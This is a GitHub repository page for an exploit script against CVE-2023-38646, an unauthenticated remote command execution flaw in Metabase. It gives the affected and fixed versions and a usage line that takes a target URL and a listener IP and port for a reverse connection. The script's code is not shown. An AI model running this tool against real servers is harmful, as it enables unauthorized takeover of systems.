Skip to content

Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.

Notifications You must be signed in to change notification settings

birdm4nw/CVE-2023-38646

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 

Repository files navigation

CVE-2023-38646 - Metabase RCE

Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.

Usage

$ python3 CVE-2023-38646.py -u targetURL -lhost LISTEN_IP -lport LISTEN_PORT

usage: CVE-2023-38646.py [-h] -u URL -lhost LOCAL_HOST -lport LOCAL_PORT CVE-2023-38646.py: error: the following arguments are required: -u/--url, -lhost/--local_host, -lport/--local_port

Example

scriptCapture

Reference

https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

About

Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages